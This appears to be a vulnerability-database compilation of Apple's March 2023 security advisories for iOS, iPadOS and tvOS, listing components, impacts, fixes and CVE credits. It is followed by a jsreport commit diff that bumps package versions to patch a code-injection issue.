This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A remote user may be able to cause unexpected app termination or arbitrary code execution

Released March 27, 2023

**Accessibility**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CommCenter**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2023-27936: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Identity Services**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-27946: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Entry added May 1, 2023

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2023-27941: Arsenii Kostromin (0x3c3e)

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**Model I/O**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27949: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Shortcuts**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

**WebKit Web Inspector**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

CVE-2023-28201: About the security content of iOS 15.7.4 and iPadOS 15.7.4

The issue was addressed with improved checks. This issue is fixed in iOS 16.4 and iPadOS 16.4. An app may be able to unexpectedly create a bookmark on the Home Screen

Released March 27, 2023

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23541: Csaba Fitzl (@theevilbit) of Offensive Security

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-23540: Mohamed GHANNAM (@\_simo36)

CVE-2023-27959: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2023-27970: Mohamed GHANNAM

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2023-23532: Mohamed Ghannam (@\_simo36)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**Calendar**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: Multiple validation issues were addressed with improved input sanitization.

CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

**Camera**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2023-23543: Yiğit Can YILMAZ (@yilmazcanyigit)

**CarPlay**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user in a privileged network position may be able to cause a denial-of-service

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-23494: Itay Iellin of General Motors Product Cyber Security

**ColorSync**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-27955: JeongOhKyea

**Core Bluetooth**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted Bluetooth packet may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability Research Institute

**CoreCapture**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**Find My**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-23537: an anonymous researcher

**FontParser**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**iCloud**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A file from an iCloud shared-by-me folder may be able to bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files downloaded from an iCloud shared-by-me folder.

CVE-2023-23526: Jubaer Alnazi of TRS Group of Companies

**Identity Services**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and jzhu working with Trend Micro Zero Day Initiative

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2023-23536: Félix Poulin-Bélanger

Entry added May 1, 2023

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Files downloaded from the internet may not have the quarantine flag applied

Description: This issue was addressed with improved checks.

CVE-2023-27943: an anonymous researcher, Brandon Dalton, Milan Tenk, and Arthur Valiev

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2023-23525: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user in a privileged network position may be able to spoof a VPN server that is configured with EAP-only authentication on a device

Description: The issue was addressed with improved authentication.

CVE-2023-28182: Zhuowei Zhang

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: A logic issue was addressed with improved restrictions.

CVE-2023-23523: developStorm

**Podcasts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to unexpectedly create a bookmark on the Home Screen

Description: The issue was addressed with improved checks.

CVE-2023-28194: Anton Spivak

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved validation.

CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies, and Wenchao Li and Xiaolong Bai of Alibaba Group

**TCC**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a malicious website may lead to address bar spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46705: Hyeon Park (@tree\_segment) of Team ApplePIE

Entry added May 1, 2023

**WebKit Web Inspector**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved state management.

CVE-2023-28201: Dohyun Lee (@l33d0hyun), crixer (@pwning\_me) of SSD Labs

Entry added May 1, 2023

CVE-2023-28194: About the security content of iOS 16.4 and iPadOS 16.4

The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, iOS 16.4 and iPadOS 16.4. An app may be able to execute arbitrary code with kernel privileges

Released March 27, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A user may gain access to protected parts of the file system

Description: The issue was addressed with improved checks.

CVE-2023-23527: Mickey Jin (@patch1t)

**Core Bluetooth**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted Bluetooth packet may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-23528: Jianjun Dai and Guang Gong of 360 Vulnerability Research Institute

**CoreCapture**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-28181: Tingting Yin of Tsinghua University

**FontParser**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-27956: Ye Zhang of Baidu Security

**Foundation**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Parsing a maliciously crafted plist may lead to an unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2023-27937: an anonymous researcher

**Identity Services**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access information about a user’s contacts

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2023-23535: ryuzaki

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-27929: Meysam Firouzi (@R00tkitSMM) of Mbition Mercedes-Benz Innovation Lab and  jzhu working with Trend Micro Zero Day Initiative

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-27969: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-27933: sqrtpwn

**Podcasts**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-27942: Mickey Jin (@patch1t)

**TCC**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by removing the vulnerable code.

CVE-2023-27931: Mickey Jin (@patch1t)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: This issue was addressed with improved state management.

WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A website may be able to track sensitive user information

Description: The issue was addressed by removing origin information.

WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

CVE-2023-28181: About the security content of tvOS 16.4

Code Injection in GitHub repository jsreport/jsreport prior to 3.11.3.

2 changes: 1 addition & 1 deletion packages/browser-client/package.json

Expand Up

@@ -32,7 +32,7 @@

"devDependencies": {

"@jsreport/jsreport-authentication": "3.4.0",

"@jsreport/jsreport-chrome-pdf": "3.3.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@rollup/plugin-commonjs": "21.0.0",

"@rollup/plugin-node-resolve": "13.0.5",

Expand Down

2 changes: 1 addition & 1 deletion packages/compile/package.json

Expand Up

@@ -39,7 +39,7 @@

},

"devDependencies": {

"@jsreport/jsreport-cli": "3.2.3",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"fs-extra": "2.1.2",

"mocha": "3.2.0",

"should": "11.2.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-assets/package.json

Expand Up

@@ -41,7 +41,7 @@

"strip-bom-buf": "2.0.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/jsreport-jsrender": "3.0.0",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-authentication/package.json

Expand Up

@@ -41,7 +41,7 @@

"password-hash": "1.2.2"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/studio-dev": "3.2.1",

"express": "4.18.2",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-authorization/package.json

Expand Up

@@ -34,7 +34,7 @@

},

"devDependencies": {

"@jsreport/jsreport-authentication": "3.4.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-fs-store": "3.2.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "5.2.0",

Expand Down

4 changes: 2 additions & 2 deletions packages/jsreport-azure-storage/package.json

Expand Up

@@ -25,7 +25,7 @@

"@azure/storage-blob": "12.5.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"mocha": "8.3.2",

"should": "13.2.3",

"standard": "16.0.4"

Expand All

@@ -39,4 +39,4 @@

"node": true

}

}

}

}

2 changes: 1 addition & 1 deletion packages/jsreport-base/package.json

Expand Up

@@ -26,7 +26,7 @@

},

"dependencies": {},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"mocha": "5.1.1",

"should": "13.2.1",

"standard": "16.0.4"

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-browser-client/package.json

Expand Up

@@ -33,7 +33,7 @@

},

"devDependencies": {

"@jsreport/studio-dev": "3.2.1",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/jsreport-handlebars": "3.2.1",

"mocha": "9.1.2",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-child-templates/package.json

Expand Up

@@ -30,7 +30,7 @@

"node.extend.without.arrays": "1.1.6"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/jsreport-jsrender": "3.0.0",

"handlebars": "4.7.7",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-chrome-pdf/package.json

Expand Up

@@ -31,7 +31,7 @@

"lodash.get": "4.4.2"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/studio-dev": "3.2.1",

"handlebars": "4.7.7",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-cli/package.json

Expand Up

@@ -71,7 +71,7 @@

},

"devDependencies": {

"@jsreport/jsreport-authentication": "3.4.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/jsreport-fs-store": "3.2.4",

"@jsreport/jsreport-handlebars": "3.2.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-components/package.json

Expand Up

@@ -35,7 +35,7 @@

},

"devDependencies": {

"@jsreport/jsreport-assets": "3.6.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/jsreport-jsrender": "3.0.0",

"@jsreport/studio-dev": "3.2.1",

Expand Down

11 changes: 11 additions & 0 deletions packages/jsreport-core/README.md

  

Expand Up

@@ -282,6 +282,17 @@ jsreport.documentStore.collection('templates')

\## Changelog

\### 3.11.4

\- update unset-value to fix security issue

\### 3.11.3

\- update vm2 to fix security issue

\- automatically disable full profiling after some time to avoid performance degradation

\- improvements to full profile serialization (prevent blocking)

\- fix profiles cleaning and calculate timeout in beforeRender

\### 3.11.2

\- add \`options.onReqReady\` to be able to receive the parsed req values

Expand Down

4 changes: 2 additions & 2 deletions packages/jsreport-core/package.json

@@ -1,6 +1,6 @@

{

"name": "@jsreport/jsreport-core",

"version": "3.11.2",

"version": "3.11.4",

"description": "javascript based business reporting",

"keywords": \[

"report",

Expand Down Expand Up

@@ -69,7 +69,7 @@

"serializator": "1.0.2",

"stack-trace": "0.0.10",

"triple-beam": "1.3.0",

"unset-value": "1.0.0",

"unset-value": "2.0.1",

"uuid": "8.3.2",

"vm2": "3.9.17",

"winston": "3.8.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-data/package.json

Expand Up

@@ -29,7 +29,7 @@

},

"dependencies": {},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/studio-dev": "3.2.1",

"handlebars": "4.7.7",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-docker-workers/package.json

Expand Up

@@ -29,7 +29,7 @@

"devDependencies": {

"@jsreport/jsreport-authentication": "3.4.0",

"@jsreport/jsreport-chrome-pdf": "3.3.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-express": "3.7.1",

"@jsreport/jsreport-fs-store": "3.2.4",

"@jsreport/jsreport-handlebars": "3.2.1",

Expand Down

4 changes: 4 additions & 0 deletions packages/jsreport-docx/README.md

  

Expand Up

@@ -7,6 +7,10 @@ See the documentation https://jsreport.net/learn/docx

  

## Changelog

  

### 3.7.1

  

\- fix docx rendering with handlebars partials

  

### 3.7.0

  

\- fix \`template.docx.templateAsset\` from payload not overwriting the \`template.docx.templateAssetShortid\`

Expand Down

4 changes: 2 additions & 2 deletions packages/jsreport-docx/package.json

@@ -1,6 +1,6 @@

{

"name": "@jsreport/jsreport-docx",

"version": "3.7.0",

"version": "3.7.1",

"description": "jsreport recipe rendering docx files",

"keywords": \[

"jsreport",

Expand Down Expand Up

@@ -51,7 +51,7 @@

},

"devDependencies": {

"@jsreport/jsreport-assets": "3.6.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-handlebars": "3.2.1",

"@jsreport/studio-dev": "3.2.1",

"handlebars": "4.7.7",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-docxtemplater/package.json

Expand Up

@@ -38,7 +38,7 @@

},

"devDependencies": {

"@jsreport/jsreport-assets": "3.6.0",

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "6.1.4",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-ejs/package.json

Expand Up

@@ -34,7 +34,7 @@

"node.extend.without.arrays": "1.1.6"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"mocha": "5.2.0",

"should": "13.2.3",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-electron-pdf/package.json

Expand Up

@@ -32,7 +32,7 @@

"stream-to-array": "2.3.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/studio-dev": "3.2.1",

"in-publish": "2.0.1",

"mocha": "8.3.2",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-express/package.json

Expand Up

@@ -40,7 +40,7 @@

"yauzl": "2.10.0"

},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

"@jsreport/jsreport-jsrender": "3.0.0",

"@jsreport/jsreport-scripts": "3.4.1",

"@jsreport/studio-dev": "3.2.1",

Expand Down

2 changes: 1 addition & 1 deletion packages/jsreport-freeze/package.json

Expand Up

@@ -28,7 +28,7 @@

},

"dependencies": {},

"devDependencies": {

"@jsreport/jsreport-core": "3.11.2",

"@jsreport/jsreport-core": "3.11.4",

